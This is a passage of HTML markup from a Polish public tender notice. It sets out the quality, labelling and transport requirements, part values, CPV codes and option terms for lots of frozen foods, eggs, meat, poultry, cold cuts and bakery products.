class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części III – mrożonki owocowo - warzywne i rybne Zamawiający wymaga, aby:<br/>a) dostarczane mrożonki owocowe - warzywne były jednolite odmianowo, w stanie dojrzałości konsumpcyjnej, czyste, sypkie, nieoblodzone, bez trwałych zlepieńców, bez uszkodzeń mechanicznych, o równych wymiarach, róże lub owoce nieuszkodzone o barwie typowej dla danego gatunku i odmiany (z wyjątkiem mieszanek), mrożonki bez oznak rozmrożenia, bez oznak obecności pleśni, bez zanieczyszczeń,<br/>b) dostarczone mrożonki rybne były jednolite, warstwy filetów przełożone folią, elementy nieposklejane, łatwe wydobywanie pojedynczych elementów z bloku, bez konieczności rozmrażania całości, mrożonki bez oznak rozmrożenia, bez oznak obecności pleśni, bez zanieczyszczeń,<br/>c) opakowanie zewnętrzne – karton + opakowanie wewnętrzne pokryte folią, oznakowane w języku polskim a etykieta musi zawierać co najmniej: nazwę, pod którą artykuł został wprowadzony do obrotu, adres producenta, ilość produktu w opakowaniu, datę przydatności do spożycia, warunki przechowywania. W przypadku ryb mrożonych glazurowanych etykieta musi zawierać informację dotyczącą procentowej zawartości ryby,<br/>d) warunki podczas transportu były zgodne z zasadami GMP/GHP, temperatura surowca<br/>w momencie przyjęcia min. – 18º C.<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1C do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 64747,59 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części IV - jaja kurze konsumpcyjne Zamawiający wymaga, aby:<br/>a) dostawy jaj były w klasie jakości A, grupie wagowej L (63 g - 73 g), świeże, z datą przydatności do spożycia minimum 14 dni od dnia dostawy Zamawiającemu,<br/>b) skorupa jaja była o normalnym kształcie, czysta, nieuszkodzona,<br/>c) jaja opakowane były w czyste, jednorazowe, papierowe wytłaczanki, każde opakowanie zbiorcze powinno zawierać etykietę,<br/>d) etykieta zbiorcza zawierała minimum: opis asortymentu, klasę jakości, temperaturę przechowywania, datę przydatności do spożycia (nie może przekroczyć daty 28 dni od daty zniesienia jaj) – w przypadku bezpośredniego producenta dopuszczalna faktura zawierająca wymagane dane,<br/>e) warunki transportowe były zgodne z zasadami GMP/GHP, temperatura przewozu jaj w momencie odbioru dostawy 8º C – 13º C.<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1D do formularza oferty. <br/>Do każdej dostawy należy dołączyć handlowy dokument identyfikacyjny zgodnie z Ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2023 r. poz. 872.) oraz Rozporządzeniem (WE) 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UEL 139 z dnia 30.04.2004 r.) <br/>Do wglądu aktualne badania bakteriologiczne jaj i fermy w kierunku salmonelli. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11170,86 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części V mięso wołowo – wieprzowe Zamawiający wymaga, aby:<br/><br/>a) mięso wołowo - wieprzowe miało zapewnioną identyfikowalność (nazwa, wykaz i ilość składników, zawartość netto w opakowaniu, data przydatności do spożycia, warunki przechowywania, firma, adres producenta, inf. odnoszące się do źródła pochodzenia).<br/>b) mięso wołowo – wieprzowe wyróżniało się wysoką jakością handlową w zakresie sposobu produkcji, składu lub właściwości organoleptycznych oraz spełniać wymagania określone w ustawie o warunkach zdrowotnych i żywienia (Dz.U.2003.208.2020).<br/>c) Warunki transportowe muszą być zgodne z zasadami GMP/GHP, temperatura surowców w czasie transportu w zakresie 0 st. C do 4st.C. Pojemniki do transportu czyste, nie uszkodzone, zamknięte, prawidłowo oznakowane. Do wglądu książeczka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, który powinien posiadać na sobie czysty fartuch.<br/>Do każdej dostawy należy dołączyć: handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16.12.2005 o produktach pochodzenia zwierzęcego (Dz. U. 2019 poz. 824 z późń.zm.) oraz Rozporządzeniem WE 853/2004 Parlamentu europejskiego i Rady z dnia 29.04.2004r., ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UEL 139 z dnia 30.04.2004r. ze zm.) <br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1E do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 65132,92 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15111000-9 - Mięso wołowe</p> <p class="mb-0">15113000-3 - Wieprzowina</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części VI mięso drobiowe Zamawiający wymaga, aby:<br/>a) Mięso drobiowe miało zapewnioną identyfikowalność (nazwa, wykaz i ilość składników, zawartość netto w opakowaniu, data przydatności do spożycia, warunki przechowywania, firma, adres producenta, inf. odnoszące się do źródła pochodzenia).<br/>b) Mięso drobiowe wyróżniało się wysoką jakością handlową w zakresie sposobu produkcji, składu lub właściwości organoleptycznych oraz spełniać wymagania określone w ustawie o warunkach zdrowotnych i żywienia (Dz.U.2003.208.2020).<br/>c) Warunki transportowe muszą być zgodne z zasadami GMP/GHP, temperatura surowców w czasie transportu w zakresie 0 st. C do 4st.C. Pojemniki do transportu czyste, nie uszkodzone, zamknięte, prawidłowo oznakowane. Do wglądu książeczka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, który powinien posiadać na sobie czysty fartuch.<br/>d) Do każdej dostawy należy dołączyć: handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16.12.2005 o produktach pochodzenia zwierzęcego (Dz. U. 2019 poz. 824 z późń.zm.) oraz Rozporządzeniem WE 853/2004 Parlamentu europejskiego i Rady z dnia 29.04.2004r., ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UEL 139 z dnia 30.04.2004r. ze zm.) <br/>e) Każde opakowanie powinno zawierać nazwę i adres producenta, nazwę surowca, ilość sztuk, datę produkcji, datę przydatności do spożycia, warunki przechowywania, wykaz składników występujących w środku spożywczym <br/>f) Firma Wykonawcy powinna znajdować się pod stałym nadzorem Państwowego Powiatowego Inspektora Sanitarnego na podstawie Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2023 r. poz. 1448) lub znajdować się pod stałym nadzorem inspekcji weterynaryjnej,<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1F do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 45794,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15114000-0 - Podroby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części VII wędliny Zamawiający wymaga, aby:<br/>a) Zamawiający wymaga dostaw niektórych rodzajów wędlin w opakowaniu o gramaturze nie większej niż 10 dag.<br/>b) Wędliny powinny mieć zapewnioną identyfikowalność (nazwa, wykaz i ilość składników, zawartość netto w opakowaniu, data przydatności do spożycia, warunki przechowywania, firma, adres producenta, inf. odnoszące się do źródła pochodzenia).<br/>c) Wędliny musza być muszą być wysokiej jakości, w gatunku I, świeże, dobrej jakości, pod względem właściwości organoleptycznych (wygląd, smak, zapach).<br/>d) Warunki transportowe muszą być zgodne z zasadami GMP/GHP temperatura surowców w czasie transportu w zakresie 0 st. C do 4st.C. Pojemniki do transportu czyste, nie uszkodzone, zamknięte, prawidłowo oznakowane. Do wglądu książeczka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, który powinien posiadać na sobie czysty fartuch. Do każdej dostawy należy dołączyć: handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16.12.2005 o produktach pochodzenia zwierzęcego Dz. U. 2019 poz. 824 z późń.zm.) oraz Rozporządzeniem WE 853/2004 Parlamentu europejskiego i Rady z dnia 29.04.2004r., ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UEL 139 z dnia 30.04.2004r. ze zm.)<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1G do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 26570,17 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131130-5 - Wędliny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części VIII pieczywo i wyroby cukiernicze Zamawiający wymaga, aby:<br/><br/>a) oferowane produkty musza być wysokiej jakości w gat. I, muszą być dopuszczone do obrotu i spełniać wymagania określone w ustawie o warunkach zdrowotnych i żywienia (Dz.U.2018 poz. 1541 z późn.zm)<br/>b) Zamawiający wymaga dostaw pieczywa i ciasta o gramaturze nie mniejszej niż podana w załączniku nr 1h do zał. nr 1 – formularza ofertowego.<br/>c) pieczywo i ciasta powinny być wysokiej jakości, bez uszkodzeń, świeże, powinny pochodzić z bieżącej produkcji.<br/>d) warunki transportowe muszą być zgodne z zasadami GMP/GHP, pojemniki do transportu pieczywa czyste, całe, nie uszkodzone. Do wglądu książeczka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, który powinien posiadać na sobie czysty fartuch.<br/>f) oferowane produkty muszą spełniać parametry jakościowe określone dla danego asortymentu przez Polskie Normy, spełniać wymogi sanitarno-epidemiologiczne i zasady systemu HACCP. Zamawiający zastrzega sobie prawo do żądania dla zaoferowanego asortymentu przedłożenia pisemnego potwierdzenia dopuszczającego dany produkt do obrotu i spożycia, wydanego przez organ uprawniony do kontroli jakości artykułów spożywczych. <br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1H do formularza oferty </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24561,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do 